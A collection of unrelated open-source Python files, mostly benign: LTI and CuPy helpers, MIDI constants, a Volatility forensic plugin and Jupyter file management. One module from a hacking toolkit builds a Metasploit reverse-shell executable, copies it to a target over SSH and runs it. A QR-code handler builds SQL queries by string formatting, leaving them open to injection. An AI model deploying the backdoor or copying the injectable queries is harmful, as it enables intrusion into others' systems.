'''
Convenience method for determining the success of the last
OutcomeRequest.
'''
return all((self.last_outcome_request,
self.last_outcome_request.was_outcome_post_successful()))
def build_return_url(self):
'''
If the Tool Consumer sent a return URL, add any set messages to the
URL.
'''
if not self.launch_presentation_return_url:
return None
lti_message_fields = ['lti_errormsg', 'lti_errorlog',
'lti_msg', 'lti_log']
messages = dict([(key, getattr(self, key))
for key in lti_message_fields
if getattr(self, key, None)])
# Disassemble original return URL and reassemble with our options added
original = urlsplit(self.launch_presentation_return_url)
combined = messages.copy()
combined.update(dict(parse_qsl(original.query)))
combined_query = urlencode(combined)
return urlunsplit((
original.scheme,
original.netloc,
original.path,
combined_query,
original.fragment
))
def new_request(self, defaults):
opts = dict(defaults)
opts.update({
'consumer_key': self.consumer_key,
'consumer_secret': self.consumer_secret,
'lis_outcome_service_url': self.lis_outcome_service_url,
'lis_result_sourcedid': self.lis_result_sourcedid
})
self.outcome_requests.append(OutcomeRequest(opts=opts))
self.last_outcome_request = self.outcome_requests[-1]
return self.last_outcome_request
class DjangoToolProvider(DjangoRequestValidatorMixin, ToolProvider):
'''
OAuth ToolProvider that works with Django requests
'''
def success_redirect(self, msg='', log=''):
'''
Shortcut for redirecting Django view to LTI Consumer with messages
'''
from django.shortcuts import redirect
self.lti_msg = msg
self.lti_log = log
return redirect(self.build_return_url())
def error_redirect(self, errormsg='', errorlog=''):
'''
Shortcut for redirecting Django view to LTI Consumer with errors
'''
from django.shortcuts import redirect
self.lti_errormsg = errormsg
self.lti_errorlog = errorlog
return redirect(self.build_return_url())
class FlaskToolProvider(FlaskRequestValidatorMixin, ToolProvider):
'''
OAuth ToolProvider that works with Flask requests
'''
pass
class WebObToolProvider(WebObRequestValidatorMixin, ToolProvider):
"""
OAuth Tool Provider that works with WebOb requests.
"""
pass
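# Minimal usage sketch (illustration only; 'key', 'secret' and request_params
# are placeholders, not values defined in this module):
#
#   tp = ToolProvider('key', 'secret', params=request_params)
#   if tp.is_launch_request() and tp.is_outcome_service():
#       tp.post_replace_result(0.85, result_data={'text': 'Well done'})
#   redirect_url = tp.build_return_url()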
|
tophatmonocle/ims_lti_py
|
ims_lti_py/tool_provider.py
|
Python
|
mit
| 7,132
|
import cupy
# TODO(okuta): Implement asfarray
def asfortranarray(a, dtype=None):
"""Return an array laid out in Fortran order in memory.
Args:
a (~cupy.ndarray): The input array.
dtype (str or dtype object, optional): By default, the data-type is
inferred from the input data.
Returns:
~cupy.ndarray: The input `a` in Fortran, or column-major, order.
.. seealso:: :func:`numpy.asfortranarray`
"""
ret = cupy.empty(a.shape[::-1], a.dtype if dtype is None else dtype).T
ret[...] = a
return ret
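# Illustrative example of the function above (doctest-style, not executed here):
#
#   >>> x = cupy.arange(6).reshape(2, 3)       # C-contiguous input
#   >>> y = cupy.asfortranarray(x)
#   >>> bool(y.flags.f_contiguous)
#   True
#   >>> bool(cupy.allclose(x, y))              # same values, different layout
#   True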
# TODO(okuta): Implement asarray_chkfinite
# TODO(okuta): Implement asscalar
# TODO(okuta): Implement require
|
cemoody/chainer
|
cupy/manipulation/kind.py
|
Python
|
mit
| 684
|
"""This file defines MIDI standard constants, which are useful for converting
between numeric MIDI data values and human-readable text.
"""
# INSTRUMENT_MAP[program_number] maps the program_number to an instrument name
INSTRUMENT_MAP = ['Acoustic Grand Piano', 'Bright Acoustic Piano',
'Electric Grand Piano', 'Honky-tonk Piano',
'Electric Piano 1', 'Electric Piano 2', 'Harpsichord',
'Clavinet', 'Celesta', 'Glockenspiel', 'Music Box',
'Vibraphone', 'Marimba', 'Xylophone', 'Tubular Bells',
'Dulcimer', 'Drawbar Organ', 'Percussive Organ',
'Rock Organ', 'Church Organ', 'Reed Organ', 'Accordion',
'Harmonica', 'Tango Accordion', 'Acoustic Guitar (nylon)',
'Acoustic Guitar (steel)', 'Electric Guitar (jazz)',
'Electric Guitar (clean)', 'Electric Guitar (muted)',
'Overdriven Guitar', 'Distortion Guitar',
'Guitar Harmonics', 'Acoustic Bass',
'Electric Bass (finger)', 'Electric Bass (pick)',
'Fretless Bass', 'Slap Bass 1', 'Slap Bass 2',
'Synth Bass 1', 'Synth Bass 2', 'Violin', 'Viola', 'Cello',
'Contrabass', 'Tremolo Strings', 'Pizzicato Strings',
'Orchestral Harp', 'Timpani', 'String Ensemble 1',
'String Ensemble 2', 'Synth Strings 1', 'Synth Strings 2',
'Choir Aahs', 'Voice Oohs', 'Synth Choir', 'Orchestra Hit',
'Trumpet', 'Trombone', 'Tuba', 'Muted Trumpet',
'French Horn', 'Brass Section', 'Synth Brass 1',
'Synth Brass 2', 'Soprano Sax', 'Alto Sax', 'Tenor Sax',
'Baritone Sax', 'Oboe', 'English Horn', 'Bassoon',
'Clarinet', 'Piccolo', 'Flute', 'Recorder', 'Pan Flute',
'Blown bottle', 'Shakuhachi', 'Whistle', 'Ocarina',
'Lead 1 (square)', 'Lead 2 (sawtooth)',
'Lead 3 (calliope)', 'Lead 4 chiff', 'Lead 5 (charang)',
'Lead 6 (voice)', 'Lead 7 (fifths)',
'Lead 8 (bass + lead)', 'Pad 1 (new age)', 'Pad 2 (warm)',
'Pad 3 (polysynth)', 'Pad 4 (choir)', 'Pad 5 (bowed)',
'Pad 6 (metallic)', 'Pad 7 (halo)', 'Pad 8 (sweep)',
'FX 1 (rain)', 'FX 2 (soundtrack)', 'FX 3 (crystal)',
'FX 4 (atmosphere)', 'FX 5 (brightness)', 'FX 6 (goblins)',
'FX 7 (echoes)', 'FX 8 (sci-fi)', 'Sitar', 'Banjo',
'Shamisen', 'Koto', 'Kalimba', 'Bagpipe', 'Fiddle',
'Shanai', 'Tinkle Bell', 'Agogo', 'Steel Drums',
'Woodblock', 'Taiko Drum', 'Melodic Tom', 'Synth Drum',
'Reverse Cymbal', 'Guitar Fret Noise', 'Breath Noise',
'Seashore', 'Bird Tweet', 'Telephone Ring', 'Helicopter',
'Applause', 'Gunshot']
# INSTRUMENT_CLASSES contains the classes present in INSTRUMENTS
INSTRUMENT_CLASSES = ['Piano', 'Chromatic Percussion', 'Organ', 'Guitar',
'Bass', 'Strings', 'Ensemble', 'Brass', 'Reed', 'Pipe',
'Synth Lead', 'Synth Pad', 'Synth Effects', 'Ethnic',
'Percussive',
'Sound Effects']
# List which maps MIDI note number - 35 to drum name
# from http://www.midi.org/techspecs/gm1sound.php
DRUM_MAP = ['Acoustic Bass Drum', 'Bass Drum 1', 'Side Stick',
'Acoustic Snare', 'Hand Clap', 'Electric Snare',
'Low Floor Tom', 'Closed Hi Hat', 'High Floor Tom',
'Pedal Hi Hat', 'Low Tom', 'Open Hi Hat',
'Low-Mid Tom', 'Hi-Mid Tom', 'Crash Cymbal 1',
'High Tom', 'Ride Cymbal 1', 'Chinese Cymbal',
'Ride Bell', 'Tambourine', 'Splash Cymbal',
'Cowbell', 'Crash Cymbal 2', 'Vibraslap',
'Ride Cymbal 2', 'Hi Bongo', 'Low Bongo',
'Mute Hi Conga', 'Open Hi Conga', 'Low Conga',
'High Timbale', 'Low Timbale', 'High Agogo',
'Low Agogo', 'Cabasa', 'Maracas',
'Short Whistle', 'Long Whistle', 'Short Guiro',
'Long Guiro', 'Claves', 'Hi Wood Block',
'Low Wood Block', 'Mute Cuica', 'Open Cuica',
'Mute Triangle', 'Open Triangle']
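# Illustrative helpers (not part of the upstream pretty_midi API; the function
# names below are hypothetical and added here only to show how the tables are
# indexed):
def program_to_instrument_name(program_number):
    """Map a General MIDI program number (0-127) to its instrument name."""
    return INSTRUMENT_MAP[program_number]
def drum_note_to_name(note_number):
    """Map a General MIDI percussion note number (35-81) to its drum name."""
    return DRUM_MAP[note_number - 35]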
|
douglaseck/pretty-midi
|
pretty_midi/constants.py
|
Python
|
mit
| 4,378
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : Victor Lin
# E-mail : linxianwusx@gmail.com
# Date : 15/02/04 19:59:23
#
import sae
import tornado.web
import shortuuid
import datetime
import time
import MySQLdb
import base64
applyTime = 30
def checkClientId(secureclientId):
try:
cryptenStr = base64.b64decode(secureclientId)
if cryptenStr[0] == 'a' and cryptenStr[7] == '3' and cryptenStr[-3] == '3' and cryptenStr[-1] == '0':
return True
else:
return False
except:
return False
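# Illustration only: checkClientId() expects a base64-encoded string whose
# decoded form has 'a' at index 0, '3' at index 7, '3' at index -3 and '0' at
# index -1.  For example (the plaintext below is made up for demonstration):
#
#   >>> checkClientId(base64.b64encode("abcdefg3xxx3x0"))
#   True
#   >>> checkClientId(base64.b64encode("not-a-valid-id"))
#   False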
def getUuid():
return shortuuid.ShortUUID().random(length=22)
def selectFreeqcFromClientId(clientId):
conn = MySQLdb.connect(host=sae.const.MYSQL_HOST,user=sae.const.MYSQL_USER,passwd=sae.const.MYSQL_PASS,db=sae.const.MYSQL_DB,port=int(sae.const.MYSQL_PORT),charset='utf8')
cursor = conn.cursor()
cursor.execute("select * from freeqc where ClientId='%s'" % clientId)
result = cursor.fetchone()
cursor.close()
conn.close()
if result:
return result
else:
return -1
def selectQrcodeFromqrcode(qrcode):
conn = MySQLdb.connect(host=sae.const.MYSQL_HOST,user=sae.const.MYSQL_USER,passwd=sae.const.MYSQL_PASS,db=sae.const.MYSQL_DB,port=int(sae.const.MYSQL_PORT),charset='utf8')
cursor = conn.cursor()
cursor.execute("select * from qrcode where QrId='%s'" % qrcode)
result = cursor.fetchone()
cursor.close()
conn.close()
return result
def insertIntoFreeqc(clientId):
conn=MySQLdb.connect(host=sae.const.MYSQL_HOST,user=sae.const.MYSQL_USER,passwd=sae.const.MYSQL_PASS,db=sae.const.MYSQL_DB,port=int(sae.const.MYSQL_PORT),charset='utf8')
cursor = conn.cursor()
uuid = getUuid()
dtn = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
if selectFreeqcFromClientId(clientId) == -1:
# never registered before, so insert
cursor.execute("insert into freeqc (ClientId,Qrcode,ApplyTime) values (%s,%s,%s)",(clientId, uuid, dtn))
else:
# already registered, so update
cursor.execute("update freeqc set Qrcode = %s where ClientId = %s",(uuid, clientId))
cursor.execute("update freeqc set Qrcode = %s where ApplyTime = %s",(uuid, dtn))
cursor.execute("insert into qrcode (QrId) values (%s)",(uuid,))
conn.commit()
cursor.close()
conn.close()
return uuid
class FreeQc(tornado.web.RequestHandler):
def post(self):
global applyTime
clientId = self.get_argument('Id')
print "ID ----> ", clientId
if checkClientId(clientId):
self.clientId = clientId
ci = selectFreeqcFromClientId(self.clientId)
if ci == -1:
# never applied for a QR code before
self.qrcode = insertIntoFreeqc(self.clientId)
print self.qrcode
self.write('{"status" : "blank" , ' +
'"code" : "' + self.qrcode + '"}')
else: # has applied for a QR code before
self.qrcode, self.applyTime = ci[2], ci[3]
ct = selectQrcodeFromqrcode(self.qrcode)
self.data = ct[2]
print "data '" + self.data + "'"
if (self.data): # already used
now = datetime.datetime.now()
used = datetime.datetime.strptime(self.applyTime,"%Y-%m-%d %H:%M:%S")
usedSeconds = (now - used).total_seconds()
if usedSeconds >= (applyTime * 60):
# TODO: QR code has expired, issue a new one
self.qrcode = insertIntoFreeqc(self.clientId)
print self.qrcode
self.write('{"status" : "blank" , ' +
'"code" : "' + self.qrcode + '"}')
else:
self.write('{"status" : "used"}')
else: # QR code not used yet
self.qrcode = insertIntoFreeqc(self.clientId)
print self.qrcode
self.write('{"status" : "blank" , ' +
'"code" : "' + self.qrcode + '"}')
else:
self.write('{"status" : "error"}')
|
XianwuLin/vscan
|
server/linxianwu/1/handler/FreeQc.py
|
Python
|
mit
| 4,195
|
# -*- coding: utf-8 -*-
"""
=================================
Wasserstein Discriminant Analysis
=================================
This example illustrates the use of WDA as proposed in [11].
[11] Flamary, R., Cuturi, M., Courty, N., & Rakotomamonjy, A. (2016).
Wasserstein Discriminant Analysis.
"""
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import numpy as np
import matplotlib.pylab as pl
from ot.dr import wda, fda
##############################################################################
# Generate data
# -------------
#%% parameters
n = 1000 # nb samples in source and target datasets
nz = 0.2
# generate circle dataset
t = np.random.rand(n) * 2 * np.pi
ys = np.floor((np.arange(n) * 1.0 / n * 3)) + 1
xs = np.concatenate(
(np.cos(t).reshape((-1, 1)), np.sin(t).reshape((-1, 1))), 1)
xs = xs * ys.reshape(-1, 1) + nz * np.random.randn(n, 2)
t = np.random.rand(n) * 2 * np.pi
yt = np.floor((np.arange(n) * 1.0 / n * 3)) + 1
xt = np.concatenate(
(np.cos(t).reshape((-1, 1)), np.sin(t).reshape((-1, 1))), 1)
xt = xt * yt.reshape(-1, 1) + nz * np.random.randn(n, 2)
nbnoise = 8
xs = np.hstack((xs, np.random.randn(n, nbnoise)))
xt = np.hstack((xt, np.random.randn(n, nbnoise)))
##############################################################################
# Plot data
# ---------
#%% plot samples
pl.figure(1, figsize=(6.4, 3.5))
pl.subplot(1, 2, 1)
pl.scatter(xt[:, 0], xt[:, 1], c=ys, marker='+', label='Source samples')
pl.legend(loc=0)
pl.title('Discriminant dimensions')
pl.subplot(1, 2, 2)
pl.scatter(xt[:, 2], xt[:, 3], c=ys, marker='+', label='Source samples')
pl.legend(loc=0)
pl.title('Other dimensions')
pl.tight_layout()
##############################################################################
# Compute Fisher Discriminant Analysis
# ------------------------------------
#%% Compute FDA
p = 2
Pfda, projfda = fda(xs, ys, p)
##############################################################################
# Compute Wasserstein Discriminant Analysis
# -----------------------------------------
#%% Compute WDA
p = 2
reg = 1e0
k = 10
maxiter = 100
Pwda, projwda = wda(xs, ys, p, reg, k, maxiter=maxiter)
##############################################################################
# Plot 2D projections
# -------------------
#%% plot samples
xsp = projfda(xs)
xtp = projfda(xt)
xspw = projwda(xs)
xtpw = projwda(xt)
pl.figure(2)
pl.subplot(2, 2, 1)
pl.scatter(xsp[:, 0], xsp[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected training samples FDA')
pl.subplot(2, 2, 2)
pl.scatter(xtp[:, 0], xtp[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected test samples FDA')
pl.subplot(2, 2, 3)
pl.scatter(xspw[:, 0], xspw[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected training samples WDA')
pl.subplot(2, 2, 4)
pl.scatter(xtpw[:, 0], xtpw[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected test samples WDA')
pl.tight_layout()
pl.show()
|
aje/POT
|
examples/plot_WDA.py
|
Python
|
mit
| 3,084
|
from backdoor import *
import os
class Windows(Backdoor):
prompt = Fore.RED + "(windows) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Windows module..."
self.core = core
self.options = {
"port" : Option("port", 53932, "port to connect to", True),
"name" : Option("name", "back.exe", "name of new backdoor", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + " Creates and starts a metasploit reverse_tcp backdoor."
def get_command(self):
return self.get_value("name")
def do_exploit(self, args):
os.system("msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=" + self.core.localIP + " LPORT=" + str(self.get_value("port")) + " -b \"\\x00\" -e x86/shikata_ga_nai -f exe -o " + self.get_value("name"))
print(GOOD + "Making the backdoor.")
self.core.curtarget.scpFiles(self, self.get_value("name"), False)
print(GOOD + "Moving the backdoor.")
print("Please enter the following commands: ")
print("msfconsole")
print("use exploit/multi/handler")
print("set payload windows/shell/reverse_tcp")
print("set LPORT " + str(self.get_value("port")))
print("set LHOST " + str(self.core.localIP))
raw_input("exploit")
self.core.curtarget.ssh.exec_command(str(self.get_command()))
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
krintoxi/NoobSec-Toolkit
|
NoobSecToolkit /scripts/sshbackdoors/backdoors/windows/windows.py
|
Python
|
gpl-2.0
| 1,540
|
# Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import struct, socket
import volatility.debug as debug
import volatility.obj as obj
import volatility.utils as utils
import volatility.plugins.linux.common as linux_common
import volatility.plugins.malware.malfind as malfind
try:
import yara
has_yara = True
except ImportError:
has_yara = False
class linux_netscan(linux_common.AbstractLinuxCommand):
"""Carves for network connection structures"""
def check_socket_back_pointer(self, i):
return i.sk == i.sk.sk_socket.sk or i.sk.sk_socket.v() == 0x0
def check_pointers(self, i):
ret = self.addr_space.profile.get_symbol_by_address("kernel", i.sk.sk_backlog_rcv.v()) != None
if ret:
ret = self.addr_space.profile.get_symbol_by_address("kernel", i.sk.sk_error_report.v()) != None
return ret
def check_proto(self, i):
return i.protocol in ("TCP", "UDP", "IP")
def check_family(self, i):
return i.sk.__sk_common.skc_family in (socket.AF_INET, socket.AF_INET6) #pylint: disable-msg=W0212
def calculate(self):
if not has_yara:
debug.error("Please install Yara from https://plusvic.github.io/yara/")
linux_common.set_plugin_members(self)
## the start of kernel memory taken from VolatilityLinuxIntelValidAS
if self.addr_space.profile.metadata.get('memory_model', '32bit') == "32bit":
kernel_start = 0xc0000000
pack_size = 4
pack_fmt = "<I"
else:
kernel_start = 0xffffffff80000000
pack_size = 8
pack_fmt = "<Q"
checks = [self.check_family, self.check_proto, self.check_socket_back_pointer, self.check_pointers]
destruct_offset = self.addr_space.profile.get_obj_offset("sock", "sk_destruct")
# sk_destruct pointer value of sock
func_addr = self.addr_space.profile.get_symbol("inet_sock_destruct")
vals = []
# convert address into a yara hex rule
for bit in range(pack_size):
idx = (pack_size - bit - 1) * 8
mask = 0xff << idx
val = ((func_addr & mask) >> idx) & 0xff
vals.insert(0, val)
s = "{" + " ".join(["%.02x" % v for v in vals]) + " }"
rules = yara.compile(sources = { 'n' : 'rule r1 {strings: $a = ' + s + ' condition: $a}' })
scanner = malfind.DiscontigYaraScanner(rules = rules, address_space = self.addr_space)
for _, address in scanner.scan(start_offset = kernel_start):
base_address = address - destruct_offset
i = obj.Object("inet_sock", offset = base_address, vm = self.addr_space)
valid = True
for check in checks:
if check(i) == False:
valid = False
break
if valid:
state = i.state if i.protocol == "TCP" else ""
family = i.sk.__sk_common.skc_family #pylint: disable-msg=W0212
sport = i.src_port
dport = i.dst_port
saddr = i.src_addr
daddr = i.dst_addr
yield (i, i.protocol, saddr, sport, daddr, dport, state)
def render_text(self, outfd, data):
for (_, proto, saddr, sport, daddr, dport, state) in data:
outfd.write("{0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s}\n".format(proto, saddr, sport, daddr, dport, state))
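# Illustration only (the address below is made up): on a 64-bit profile with
# func_addr = 0xffffffff81234560, the loop above builds the little-endian byte
# pattern and the generated yara hex string is
#
#   s = "{60 45 23 81 ff ff ff ff }"
#
# Each hit is rewound by the offset of sock.sk_destruct to obtain a candidate
# inet_sock, which is then run through the check_* validators before being
# reported.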
|
fengxiaoiie/volatility
|
volatility/plugins/linux/netscan.py
|
Python
|
gpl-2.0
| 4,373
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id$
"""
VirtualBox Validation Kit - CGI - Log out page.
"""
__copyright__ = \
"""
Copyright (C) 2012-2014 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision$"
# Standard python imports.
import os
import sys
# Only the main script needs to modify the path.
g_ksValidationKitDir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))));
sys.path.append(g_ksValidationKitDir);
# Validation Kit imports.
from testmanager.core.webservergluecgi import WebServerGlueCgi
def main():
"""
Main function a la C/C++. Returns exit code.
"""
oSrvGlue = WebServerGlueCgi(g_ksValidationKitDir, fHtmlOutput = True)
sUser = oSrvGlue.getLoginName()
if sUser != oSrvGlue.ksUnknownUser and sUser != 'logout':
oSrvGlue.write('<p>Broken apache config!\n'
'The logout.py script should be configured with .htaccess-logout and require user logout!</p>')
else:
oSrvGlue.write('<p>Successfully logged out!</p>')
oSrvGlue.write('<p><a href="%sadmin.py">Log in</a> under another user name.</p>' %
(oSrvGlue.getBaseUrl(),))
oSrvGlue.write('<hr/><p>debug info:</p>')
oSrvGlue.debugInfoPage()
oSrvGlue.flush()
return 0
if __name__ == '__main__':
sys.exit(main())
|
svn2github/vbox
|
src/VBox/ValidationKit/testmanager/cgi/logout.py
|
Python
|
gpl-2.0
| 2,233
|
from .csv import CSVCommPlugin
from .ros import ROSCommPlugin
plugin_map = {
"csv": CSVCommPlugin,
"csv_comm": CSVCommPlugin,
"ros": ROSCommPlugin,
"ros_comm": ROSCommPlugin
}
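# Illustration only: callers are expected to resolve a comm plugin class by
# name, e.g. plugin_cls = plugin_map.get("ros_comm"); instantiation arguments
# depend on the plugin base class and are not shown here.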
|
davoclavo/openag_brain
|
src/openag_lib/firmware/plugins/__init__.py
|
Python
|
gpl-3.0
| 193
|
import os
BASEDIR = os.path.abspath(os.path.dirname(__file__))
# If BASE is https, these have to be specified
SERVER_CERT = "%s/certificates/server.crt" % BASEDIR
SERVER_KEY = "%s/certificates/server.key" % BASEDIR
#CERT_CHAIN = None
CA_BUNDLE = None
VERIFY_SSL = False
|
mokemokechicken/oictest_docker
|
example/etc/rp/sslconf.py
|
Python
|
gpl-3.0
| 271
|
#!/usr/bin/env python
########################################################################
# File : dirac-start-mysql
# Author : Ricardo Graciani
########################################################################
"""
Start DIRAC MySQL server
"""
__RCSID__ = "$Id$"
#
from DIRAC.Core.Base import Script
Script.disableCS()
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'Usage:',
' %s [option|cfgfile] ...' % Script.scriptName,
] ) )
Script.parseCommandLine()
#
from DIRAC.FrameworkSystem.Client.ComponentInstaller import gComponentInstaller
#
gComponentInstaller.exitOnError = True
#
print gComponentInstaller.startMySQL()['Value'][1]
|
Andrew-McNab-UK/DIRAC
|
Core/scripts/dirac-start-mysql.py
|
Python
|
gpl-3.0
| 776
|
"""A contents manager that uses the local file system for storage."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os
import shutil
import mimetypes
from tornado import web
from .filecheckpoints import FileCheckpoints
from .fileio import FileManagerMixin
from .manager import ContentsManager
from IPython import nbformat
from IPython.utils.importstring import import_item
from IPython.utils.traitlets import Any, Unicode, Bool, TraitError
from IPython.utils.py3compat import getcwd, string_types
from IPython.utils import tz
from IPython.html.utils import (
is_hidden,
to_api_path,
)
_script_exporter = None
def _post_save_script(model, os_path, contents_manager, **kwargs):
"""convert notebooks to Python script after save with nbconvert
replaces `ipython notebook --script`
"""
from IPython.nbconvert.exporters.script import ScriptExporter
if model['type'] != 'notebook':
return
global _script_exporter
if _script_exporter is None:
_script_exporter = ScriptExporter(parent=contents_manager)
log = contents_manager.log
base, ext = os.path.splitext(os_path)
py_fname = base + '.py'
script, resources = _script_exporter.from_filename(os_path)
script_fname = base + resources.get('output_extension', '.txt')
log.info("Saving script /%s", to_api_path(script_fname, contents_manager.root_dir))
with io.open(script_fname, 'w', encoding='utf-8') as f:
f.write(script)
class FileContentsManager(FileManagerMixin, ContentsManager):
root_dir = Unicode(config=True)
def _root_dir_default(self):
try:
return self.parent.notebook_dir
except AttributeError:
return getcwd()
save_script = Bool(False, config=True, help='DEPRECATED, use post_save_hook')
def _save_script_changed(self):
self.log.warn("""
`--script` is deprecated. You can trigger nbconvert via pre- or post-save hooks:
ContentsManager.pre_save_hook
FileContentsManager.post_save_hook
A post-save hook has been registered that calls:
ipython nbconvert --to script [notebook]
which behaves similarly to `--script`.
""")
self.post_save_hook = _post_save_script
post_save_hook = Any(None, config=True,
help="""Python callable or importstring thereof
to be called on the path of a file just saved.
This can be used to process the file on disk,
such as converting the notebook to a script or HTML via nbconvert.
It will be called as (all arguments passed by keyword)::
hook(os_path=os_path, model=model, contents_manager=instance)
- path: the filesystem path to the file just written
- model: the model representing the file
- contents_manager: this ContentsManager instance
"""
)
def _post_save_hook_changed(self, name, old, new):
if new and isinstance(new, string_types):
self.post_save_hook = import_item(self.post_save_hook)
elif new:
if not callable(new):
raise TraitError("post_save_hook must be callable")
def run_post_save_hook(self, model, os_path):
"""Run the post-save hook if defined, and log errors"""
if self.post_save_hook:
try:
self.log.debug("Running post-save hook on %s", os_path)
self.post_save_hook(os_path=os_path, model=model, contents_manager=self)
except Exception:
self.log.error("Post-save hook failed on %s", os_path, exc_info=True)
def _root_dir_changed(self, name, old, new):
"""Do a bit of validation of the root_dir."""
if not os.path.isabs(new):
# If we receive a non-absolute path, make it absolute.
self.root_dir = os.path.abspath(new)
return
if not os.path.isdir(new):
raise TraitError("%r is not a directory" % new)
def _checkpoints_class_default(self):
return FileCheckpoints
def is_hidden(self, path):
"""Does the API style path correspond to a hidden directory or file?
Parameters
----------
path : string
The path to check. This is an API path (`/` separated,
relative to root_dir).
Returns
-------
hidden : bool
Whether the path exists and is hidden.
"""
path = path.strip('/')
os_path = self._get_os_path(path=path)
return is_hidden(os_path, self.root_dir)
def file_exists(self, path):
"""Returns True if the file exists, else returns False.
API-style wrapper for os.path.isfile
Parameters
----------
path : string
The relative path to the file (with '/' as separator)
Returns
-------
exists : bool
Whether the file exists.
"""
path = path.strip('/')
os_path = self._get_os_path(path)
return os.path.isfile(os_path)
def dir_exists(self, path):
"""Does the API-style path refer to an extant directory?
API-style wrapper for os.path.isdir
Parameters
----------
path : string
The path to check. This is an API path (`/` separated,
relative to root_dir).
Returns
-------
exists : bool
Whether the path is indeed a directory.
"""
path = path.strip('/')
os_path = self._get_os_path(path=path)
return os.path.isdir(os_path)
def exists(self, path):
"""Returns True if the path exists, else returns False.
API-style wrapper for os.path.exists
Parameters
----------
path : string
The API path to the file (with '/' as separator)
Returns
-------
exists : bool
Whether the target exists.
"""
path = path.strip('/')
os_path = self._get_os_path(path=path)
return os.path.exists(os_path)
def _base_model(self, path):
"""Build the common base of a contents model"""
os_path = self._get_os_path(path)
info = os.stat(os_path)
last_modified = tz.utcfromtimestamp(info.st_mtime)
created = tz.utcfromtimestamp(info.st_ctime)
# Create the base model.
model = {}
model['name'] = path.rsplit('/', 1)[-1]
model['path'] = path
model['last_modified'] = last_modified
model['created'] = created
model['content'] = None
model['format'] = None
model['mimetype'] = None
try:
model['writable'] = os.access(os_path, os.W_OK)
except OSError:
self.log.error("Failed to check write permissions on %s", os_path)
model['writable'] = False
return model
def _dir_model(self, path, content=True):
"""Build a model for a directory
if content is requested, will include a listing of the directory
"""
os_path = self._get_os_path(path)
four_o_four = u'directory does not exist: %r' % path
if not os.path.isdir(os_path):
raise web.HTTPError(404, four_o_four)
elif is_hidden(os_path, self.root_dir):
self.log.info("Refusing to serve hidden directory %r, via 404 Error",
os_path
)
raise web.HTTPError(404, four_o_four)
model = self._base_model(path)
model['type'] = 'directory'
if content:
model['content'] = contents = []
os_dir = self._get_os_path(path)
for name in os.listdir(os_dir):
os_path = os.path.join(os_dir, name)
# skip over broken symlinks in listing
if not os.path.exists(os_path):
self.log.warn("%s doesn't exist", os_path)
continue
elif not os.path.isfile(os_path) and not os.path.isdir(os_path):
self.log.debug("%s not a regular file", os_path)
continue
if self.should_list(name) and not is_hidden(os_path, self.root_dir):
contents.append(self.get(
path='%s/%s' % (path, name),
content=False)
)
model['format'] = 'json'
return model
def _file_model(self, path, content=True, format=None):
"""Build a model for a file
if content is requested, include the file contents.
format:
If 'text', the contents will be decoded as UTF-8.
If 'base64', the raw bytes contents will be encoded as base64.
If not specified, try to decode as UTF-8, and fall back to base64
"""
model = self._base_model(path)
model['type'] = 'file'
os_path = self._get_os_path(path)
if content:
content, format = self._read_file(os_path, format)
default_mime = {
'text': 'text/plain',
'base64': 'application/octet-stream'
}[format]
model.update(
content=content,
format=format,
mimetype=mimetypes.guess_type(os_path)[0] or default_mime,
)
return model
def _notebook_model(self, path, content=True):
"""Build a notebook model
if content is requested, the notebook content will be populated
as a JSON structure (not double-serialized)
"""
model = self._base_model(path)
model['type'] = 'notebook'
if content:
os_path = self._get_os_path(path)
nb = self._read_notebook(os_path, as_version=4)
self.mark_trusted_cells(nb, path)
model['content'] = nb
model['format'] = 'json'
self.validate_notebook_model(model)
return model
def get(self, path, content=True, type=None, format=None):
""" Takes a path for an entity and returns its model
Parameters
----------
path : str
the API path that describes the relative path for the target
content : bool
Whether to include the contents in the reply
type : str, optional
The requested type - 'file', 'notebook', or 'directory'.
Will raise HTTPError 400 if the content doesn't match.
format : str, optional
The requested format for file contents. 'text' or 'base64'.
Ignored if this returns a notebook or directory model.
Returns
-------
model : dict
the contents model. If content=True, returns the contents
of the file or directory as well.
"""
path = path.strip('/')
if not self.exists(path):
raise web.HTTPError(404, u'No such file or directory: %s' % path)
